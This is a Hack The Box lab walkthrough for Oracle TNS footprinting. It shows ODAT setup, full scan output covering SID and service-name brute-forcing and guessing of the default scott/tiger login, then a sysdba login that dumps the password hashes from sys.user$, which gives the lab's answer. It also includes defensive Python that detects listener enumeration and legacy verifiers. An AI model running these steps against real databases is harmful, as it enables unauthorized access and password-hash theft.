Hack The Box: Complete walkthrough of the Oracle TNS Footprinting lab module.

Solution to the HTB Oracle TNS Footprinting lesson

The Hack The Box (HTB) Oracle TNS Footprinting module teaches you how to enumerate, and potentially exploit, the Oracle Transparent Network Substrate (TNS), the network protocol Oracle uses for communication between its databases and client applications. Here’s how to derive the solution and capture the flag.

Your task in this exercise is to enumerate the target Oracle database and submit the password hash of the DBSNMP user as the answer. Fire up the provided Pwnbox virtual machine and open a terminal.

Install Oracle tools

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

Then test it with:

./odat.py -h

Scan with ODAT

Now we can scan the instance with the ODAT toolset. Note that the scan takes a long time to run, especially if your virtual machine’s connection is using UDP (switch it to TCP instead).

During the scan you will receive a vague (and confusing) prompt; answering it the wrong way stops your scan. Here’s the *wrong* way to answer the prompt.

./odat.py all -s 10.129.205.19
[+] Checking if target 10.129.205.19:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.129.205.19:1521 is well configured. Continue...

[1] (10.129.205.19:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] Impossible to know if target is vulnerable to a remote TNS poisoning because SID is not given.

[2] (10.129.205.19:1521): Searching valid SIDs
[2.1] Searching valid SIDs thanks to a well known SID list on the 10.129.205.19:1521 server
[+] 'XE' is a valid SID. Continue... ######################## | ETA: 00:00:00
100% |#########################################################| Time: 00:01:45
[2.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.129.205.19:1521)
100% |#########################################################| Time: 00:00:03
[2.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.129.205.19:1521)
[+] 'XE' is a valid SID. Continue... ################## | ETA: 00:00:10
100% |#########################################################| Time: 00:01:32
[+] SIDs found on the 10.129.205.19:1521 server: XE

[3] (10.129.205.19:1521): Searching valid Service Names
[3.1] Searching valid Service Names thanks to a well known Service Name list on the 10.129.205.19:1521 server
[+] 'XE' is a valid Service Name. Continue... ##### | ETA: 00:00:00
[+] 'XEXDB' is a valid Service Name. Continue...
100% |#########################################################| Time: 00:01:46
[3.2] Searching valid Service Names thanks to a brute-force attack on 1 chars now (10.129.205.19:1521)
100% |#########################################################| Time: 00:00:05
[3.3] Searching valid Service Names thanks to a brute-force attack on 2 chars now (10.129.205.19:1521)
[+] 'XE' is a valid Service Name. Continue... | ETA: 00:00:10
100% |#########################################################| Time: 00:01:31
[+] Service Name(s) found on the 10.129.205.19:1521 server: XE,XEXDB
[!] Notice: SID 'XE' found. Service Name 'XE' found too: Identical database instance. Removing Service Name 'XE' from Service Name list in order to don't do same checks twice

[4] (10.129.205.19:1521): Searching valid accounts on the XE SID
The login cis has already been tested at least once. What do you want to do::36
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
s
100% |#########################################################| Time: 00:01:37
[-] No found a valid account on 10.129.205.19:1521/XE. You should try with the option '--accounts-file accounts/accounts_multiple.txt' or '--accounts-files accounts/logins.txt accounts/pwds.txt'

[5] (10.129.205.19:1521): Searching valid accounts on the XEXDB Service Name
The login abm has already been tested at least once. What do you want to do::--
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
s
100% |#########################################################| Time: 00:00:03
[-] No found a valid account on 10.129.205.19:1521/XEXDB. You should try with the option '--accounts-file accounts/accounts_multiple.txt' or '--accounts-files accounts/logins.txt accounts/pwds.txt'

Note that our scan did not return anything that helps us derive the DBSNMP password hash. That is because, when prompted with “The login cis has already been tested at least once. What do you want to do::36”, we answered “s” (stop). We should have chosen the “continue without to ask” option (c).

Scan with ODAT but select “continue without to ask” when prompted

The scan below, with the prompt answered “c”, discovers the scott/tiger login in the database.

./odat.py all -s 10.129.205.19
[+] Checking if target 10.129.205.19:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.129.205.19:1521 is well configured. Continue...

[1] (10.129.205.19:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] Impossible to know if target is vulnerable to a remote TNS poisoning because SID is not given.

[2] (10.129.205.19:1521): Searching valid SIDs
[2.1] Searching valid SIDs thanks to a well known SID list on the 10.129.205.19:1521 server
[+] 'XE' is a valid SID. Continue...  ######################## | ETA:  00:00:00 
100% |#########################################################| Time: 00:01:43 
[2.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.129.205.19:1521)
100% |#########################################################| Time: 00:00:03 
[2.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.129.205.19:1521)
[+] 'XE' is a valid SID. Continue...  ##################       | ETA:  00:00:10 
100% |#########################################################| Time: 00:01:36 
[+] SIDs found on the 10.129.205.19:1521 server: XE

[3] (10.129.205.19:1521): Searching valid Service Names
[3.1] Searching valid Service Names thanks to a well known Service Name list on the 10.129.205.19:1521 server
[+] 'XE' is a valid Service Name. Continue...            ##### | ETA:  00:00:01 
[+] 'XEXDB' is a valid Service Name. Continue...         
100% |#########################################################| Time: 00:01:52 
[3.2] Searching valid Service Names thanks to a brute-force attack on 1 chars now (10.129.205.19:1521)
100% |#########################################################| Time: 00:00:03 
[3.3] Searching valid Service Names thanks to a brute-force attack on 2 chars now (10.129.205.19:1521)
[+] 'XE' is a valid Service Name. Continue...                  | ETA:  00:00:10 
100% |#########################################################| Time: 00:01:37 
[+] Service Name(s) found on the 10.129.205.19:1521 server: XE,XEXDB
[!] Notice: SID 'XE' found. Service Name 'XE' found too: Identical database instance. Removing Service Name 'XE' from Service Name list in order to don't do same checks twice

[4] (10.129.205.19:1521): Searching valid accounts on the XE SID
The login cis has already been tested at least once. What do you want to do::28 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password4 
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password6 
[!] Notice: 'dip' account is locked, so skipping this username for password5:59 
[!] Notice: 'hr' account is locked, so skipping this username for password04:43 
[!] Notice: 'mdsys' account is locked, so skipping this username for password32 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password
[!] Notice: 'outln' account is locked, so skipping this username for password26 
[+] Valid credentials found: scott/tiger. Continue...          | ETA:  00:01:19 
[!] Notice: 'xdb' account is locked, so skipping this username for password0:15 
100% |#########################################################| Time: 00:06:35 
[+] Accounts found on 10.129.205.19:1521/sid:XE: 
scott/tiger


[5] (10.129.205.19:1521): Searching valid accounts on the XEXDB Service Name
The login abm has already been tested at least once. What do you want to do::-- 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password8 
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password4 
[!] Notice: 'dip' account is locked, so skipping this username for password5:21 
[!] Notice: 'hr' account is locked, so skipping this username for password04:19 
[!] Notice: 'mdsys' account is locked, so skipping this username for password19 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password
[!] Notice: 'outln' account is locked, so skipping this username for password20 
[+] Valid credentials found: scott/tiger. Continue...          | ETA:  00:01:17 
[!] Notice: 'xdb' account is locked, so skipping this username for password0:15 
100% |#########################################################| Time: 00:06:24 
[+] Accounts found on 10.129.205.19:1521/serviceName:XEXDB: 
scott/tiger


[6] (10.129.205.19:1521): Testing all authenticated modules on sid:XE with the scott/tiger account
[6.1] UTL_HTTP library ?
[-] KO
[6.2] HTTPURITYPE library ?
19:18:59 WARNING -: Impossible to fetch all the rows of the query select httpuritype('http://0.0.0.0/').getclob() from dual: `ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`
[-] KO
[6.3] UTL_FILE library ?
[-] KO
[6.4] JAVA library ?
[-] KO
[6.5] DBMSADVISOR library ?
[-] KO
[6.6] DBMSSCHEDULER library ?
[-] KO
[6.7] CTXSYS library ?
[-] KO
[6.8] Hashed Oracle passwords ?
[-] KO
[6.9] Hashed Oracle passwords with a view in ORACLE_OCM?
19:19:00 WARNING -: Hashes can not be got with Oracle_OCM. This method is only valid when database is 12c or higher
[-] KO
[-] KO
[6.10] Hashed Oracle passwords from history?
[-] KO
[6.11] DBMS_XSLPROCESSOR library ?
[-] KO
[6.12] External table to read files ?
[-] KO
[6.13] External table to execute system commands ?
[-] KO
[6.14] Oradbg ?
[-] KO
[6.15] DBMS_LOB to read files ?
[-] KO
[6.16] SMB authentication capture ?
[-] KO
[6.17] Gain elevated access (privilege escalation)?
[6.17.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[-] KO
[6.17.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[6.17.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[6.17.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[6.17.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[6.18] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[-] KO
[6.19] Create file on target (CVE-2018-3004)?
[-] KO
[6.20] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[+] Impossible to know if the database is vulnreable to the CVE-2012-3137. You need to run this as root because it needs to sniff authentications to the database

[7] (10.129.205.19:1521): Oracle users have not the password identical to the username ?
[!] Notice: 'XS$NULL' account is locked, so skipping this username for password 
The login XS$NULL has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'APEX_040000' account is locked, so skipping this username for password
[!] Notice: 'APEX_PUBLIC_USER' account is locked, so skipping this username for password
[!] Notice: 'FLOWS_FILES' account is locked, so skipping this username for password
[!] Notice: 'HR' account is locked, so skipping this username for password00:47 
[!] Notice: 'MDSYS' account is locked, so skipping this username for password37 
[!] Notice: 'XDB' account is locked, so skipping this username for password0:25 
[!] Notice: 'CTXSYS' account is locked, so skipping this username for password0 
[!] Notice: 'APPQOSSYS' account is locked, so skipping this username for password
[!] Notice: 'DBSNMP' account is locked, so skipping this username for password2 
[!] Notice: 'ORACLE_OCM' account is locked, so skipping this username for password
[!] Notice: 'DIP' account is locked, so skipping this username for password0:07 
[!] Notice: 'OUTLN' account is locked, so skipping this username for password05 
100% |#########################################################| Time: 00:00:36 
[-] No found a valid account on 10.129.205.19:1521/sid:XE with usernameLikePassword module

[8] (10.129.205.19:1521): Testing all authenticated modules on ServiceName:XEXDB with the scott/tiger account
[8.1] UTL_HTTP library ?
[-] KO
[8.2] HTTPURITYPE library ?
19:19:45 WARNING -: Impossible to fetch all the rows of the query select httpuritype('http://0.0.0.0/').getclob() from dual: `ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`
[-] KO
[8.3] UTL_FILE library ?
[-] KO
[8.4] JAVA library ?
[-] KO
[8.5] DBMSADVISOR library ?
[-] KO
[8.6] DBMSSCHEDULER library ?
[-] KO
[8.7] CTXSYS library ?
[-] KO
[8.8] Hashed Oracle passwords ?
[-] KO
[8.9] Hashed Oracle passwords with a view in ORACLE_OCM?
19:19:47 WARNING -: Hashes can not be got with Oracle_OCM. This method is only valid when database is 12c or higher
[-] KO
[-] KO
[8.10] Hashed Oracle passwords from history?
[-] KO
[8.11] DBMS_XSLPROCESSOR library ?
[-] KO
[8.12] External table to read files ?
[-] KO
[8.13] External table to execute system commands ?
[-] KO
[8.14] Oradbg ?
[-] KO
[8.15] DBMS_LOB to read files ?
[-] KO
[8.16] SMB authentication capture ?
[-] KO
[8.17] Gain elevated access (privilege escalation)?
[8.17.6] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[-] KO
[8.17.7] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[8.17.8] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[8.17.9] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[8.17.10] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[8.18] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[-] KO
[8.19] Create file on target (CVE-2018-3004)?
[-] KO
[8.20] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[+] Impossible to know if the database is vulnreable to the CVE-2012-3137. You need to run this as root because it needs to sniff authentications to the database

[9] (10.129.205.19:1521): Oracle users have not the password identical to the username ?
The login XS$NULL has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'XS$NULL' account is locked, so skipping this username for password
[!] Notice: 'APEX_040000' account is locked, so skipping this username for password
[!] Notice: 'APEX_PUBLIC_USER' account is locked, so skipping this username for password
[!] Notice: 'FLOWS_FILES' account is locked, so skipping this username for password
[!] Notice: 'HR' account is locked, so skipping this username for password00:19 
[!] Notice: 'MDSYS' account is locked, so skipping this username for password16 
[!] Notice: 'XDB' account is locked, so skipping this username for password0:11 
[!] Notice: 'CTXSYS' account is locked, so skipping this username for password9 
[!] Notice: 'APPQOSSYS' account is locked, so skipping this username for password
[!] Notice: 'DBSNMP' account is locked, so skipping this username for password6 
[!] Notice: 'ORACLE_OCM' account is locked, so skipping this username for password
[!] Notice: 'DIP' account is locked, so skipping this username for password0:03 
[!] Notice: 'OUTLN' account is locked, so skipping this username for password02 
100% |#########################################################| Time: 00:00:27 
[-] No found a valid account on 10.129.205.19:1521/ServiceName:XEXDB with usernameLikePassword module
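The SID and service-name guessing in phases [2] and [3] of both scans leaves a trail on the server: every connect request the listener rejects is written to listener.log with a TNS return code (12505 for an unknown SID, 12514 for an unknown service name). The Python below is an added example, not part of the original walkthrough or of ODAT, that flags a client which asks for many unknown names in a short window and lists which names it did reach; the log lines, client addresses, hostnames and thresholds are all constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed listener.log excerpt (not captured from the lab): one legitimate connect from
# 10.10.20.7, then one client (10.10.14.5) guessing SIDs and service names the way ODAT does.
SAMPLE_LISTENER_LOG = """\
21-JUN-2025 08:40:01 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.20.7)(PORT=50112)) * establish * XE * 0
21-JUN-2025 08:40:02 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=python3)(HOST=pwnbox)(USER=htb))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=41200)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JUN-2025 08:40:02 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=python3)(HOST=pwnbox)(USER=htb))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=41201)) * establish * PROD * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JUN-2025 08:40:03 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=python3)(HOST=pwnbox)(USER=htb))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=41202)) * establish * XE * 0
21-JUN-2025 08:40:03 * (CONNECT_DATA=(SERVICE_NAME=A)(CID=(PROGRAM=python3)(HOST=pwnbox)(USER=htb))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=41203)) * establish * A * 12514
TNS-12514: TNS:listener does not currently know of service requested in connect descriptor
21-JUN-2025 08:40:04 * (CONNECT_DATA=(SERVICE_NAME=B)(CID=(PROGRAM=python3)(HOST=pwnbox)(USER=htb))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=41204)) * establish * B * 12514
TNS-12514: TNS:listener does not currently know of service requested in connect descriptor
21-JUN-2025 08:40:04 * (CONNECT_DATA=(SERVICE_NAME=XEXDB)(CID=(PROGRAM=python3)(HOST=pwnbox)(USER=htb))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=41205)) * establish * XEXDB * 0
"""

# One "establish" record: timestamp, client address from ADDRESS=(...), requested name, return code.
ESTABLISH = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* \(CONNECT_DATA=.*?"
    r"\(HOST=(?P<client>[^)]+)\)\(PORT=\d+\)\) \* establish \* (?P<name>\S+) \* (?P<rc>\d+)$"
)
UNKNOWN_TARGET_CODES = {"12505", "12514"}  # unknown SID / unknown service name

def parse_establish_records(text):
    """Return (timestamp, client, name, rc) tuples for every establish line in the log."""
    records = []
    for line in text.splitlines():
        m = ESTABLISH.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
            records.append((ts, m["client"], m["name"], m["rc"]))
    return records

def find_name_enumeration(records, window_seconds=60, min_distinct=3):
    """Map client -> sorted unknown names for clients guessing >= min_distinct names in one window."""
    attempts = defaultdict(list)
    for ts, client, name, rc in records:
        if rc in UNKNOWN_TARGET_CODES:
            attempts[client].append((ts, name))
    findings = {}
    for client, hits in attempts.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):  # slide a window starting at each rejected request
            names = {n for t, n in hits[i:] if (t - start).total_seconds() <= window_seconds}
            if len(names) >= min_distinct:
                findings[client] = sorted(names)
                break
    return findings

def names_reached(records, client):
    """Sorted names the listener accepted (rc 0) from this client: what the enumeration found."""
    return sorted({name for _, c, name, rc in records if c == client and rc == "0"})

if __name__ == "__main__":
    print(find_name_enumeration(parse_establish_records(SAMPLE_LISTENER_LOG)))
```

On a real server the file sits under the ADR diag directory and rotates, so feed the parser the current segment; the 60-second window and three-name threshold are starting points to tune against normal connect rates.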

Query users from the database using the found scott/tiger login as sysdba

With the scott/tiger login in hand, connect to the database (XE SID) as sysdba and query all user accounts in the database. The sys.user$ base table is owned by SYS, which is why the sysdba connection is needed to read it.

sqlplus scott/tiger@10.129.171.160/XE as sysdba

SQL*Plus: Release 21.0.0.0.0 - Production on Sat Jun 21 08:40:35 2025
Version 21.12.0.0.0

Copyright (c) 1982, 2022, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL> select name, password from sys.user$;

NAME			       PASSWORD
------------------------------ ------------------------------
SYS			       FBA343E7D6C8BC9D
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM			       B5073FE1DE351687
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
OUTLN			       4A3BA55E08595C81
EXP_FULL_DATABASE

NAME			       PASSWORD
------------------------------ ------------------------------
IMP_FULL_DATABASE
LOGSTDBY_ADMINISTRATOR
DBFS_ROLE
DIP			       CE4A36B8E06CA59C
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
DATAPUMP_EXP_FULL_DATABASE
DATAPUMP_IMP_FULL_DATABASE
ADM_PARALLEL_EXECUTE_TASK
GATHER_SYSTEM_STATISTICS
XDB_WEBSERVICES_OVER_HTTP

NAME			       PASSWORD
------------------------------ ------------------------------
ORACLE_OCM		       5A2E026A9157958C
RECOVERY_CATALOG_OWNER
SCHEDULER_ADMIN
HS_ADMIN_SELECT_ROLE
HS_ADMIN_EXECUTE_ROLE
HS_ADMIN_ROLE
OEM_ADVISOR
OEM_MONITOR
DBSNMP			       E066D214D5421CCC
APPQOSSYS		       519D632B7EE7F63A
PLUSTRACE

NAME			       PASSWORD
------------------------------ ------------------------------
CTXSYS			       D1D21CA56994CAB6
CTXAPP
XDB			       E76A6BD999EF9FF1
ANONYMOUS		       anonymous
XDBADMIN
XDB_SET_INVOKER
AUTHENTICATEDUSER
XDB_WEBSERVICES
XDB_WEBSERVICES_WITH_PUBLIC
XS$NULL 		       DC4FCC8CB69A6733
_NEXT_USER

NAME			       PASSWORD
------------------------------ ------------------------------
MDSYS			       72979A94BAD2AF80
HR			       4C6D73C3E8B0F0DA
FLOWS_FILES		       30128982EA6D4A3D
APEX_PUBLIC_USER	       4432BA224E12410A
APEX_ADMINISTRATOR_ROLE
APEX_040000		       E7CE9863D7EEB0A4
SCOTT			       F894844C34402B67

51 rows selected.

The hashed password for the DBSNMP user (on our lab’s virtual machine) is E066D214D5421CCC.
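The 16-hex-character values in the password column above are the legacy Oracle 10g verifier (a DES construction salted only by the username and case-insensitive), which is what makes an exposed hash like DBSNMP’s dangerous; the 11g SHA-1 verifier is stored in the spare4 column instead, and the rows with no value are roles or accounts with no verifier in this column. The Python below is an added example, not part of the walkthrough, that parses a sqlplus listing in this layout and reports which accounts still carry a legacy verifier; the listing is a constructed subset of the rows above.

```python
import re

# Constructed subset of the sys.user$ listing above, with the tab/space padding sqlplus prints.
SAMPLE_LISTING = """\
NAME\t\t\t       PASSWORD
------------------------------ ------------------------------
SYS\t\t\t       FBA343E7D6C8BC9D
PUBLIC
CONNECT
DBA
SYSTEM\t\t\t       B5073FE1DE351687
DBSNMP\t\t\t       E066D214D5421CCC
ANONYMOUS\t\t       anonymous
XS$NULL \t\t       DC4FCC8CB69A6733
SCOTT\t\t\t       F894844C34402B67

9 rows selected.
"""

LEGACY_10G = re.compile(r"[0-9A-F]{16}")  # 8-byte DES verifier as uppercase hex

def parse_listing(text):
    """Return {NAME: password column or None} from a 'select name, password from sys.user$' run."""
    rows = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith(("NAME", "---")) or line.endswith("rows selected."):
            continue  # skip repeated page headers, rule lines and the row-count trailer
        fields = line.split()
        rows[fields[0]] = fields[1] if len(fields) > 1 else None
    return rows

def verifier_kind(value):
    """Classify what the password column holds for one row."""
    if value is None:
        return "none"        # roles (PUBLIC, DBA, ...) or no verifier stored in this column
    if LEGACY_10G.fullmatch(value):
        return "legacy-10g"  # case-insensitive, username-salted DES: the format offline crackers target
    return "other"           # e.g. ANONYMOUS's literal 'anonymous', which is not a hash

def legacy_verifier_accounts(text):
    """Sorted names of accounts whose stored verifier is the legacy 10g format."""
    return sorted(n for n, v in parse_listing(text).items() if verifier_kind(v) == "legacy-10g")

if __name__ == "__main__":
    for name in legacy_verifier_accounts(SAMPLE_LISTING):
        print(f"{name}: legacy 10g verifier present; rotate the password and stop generating 10g verifiers")
```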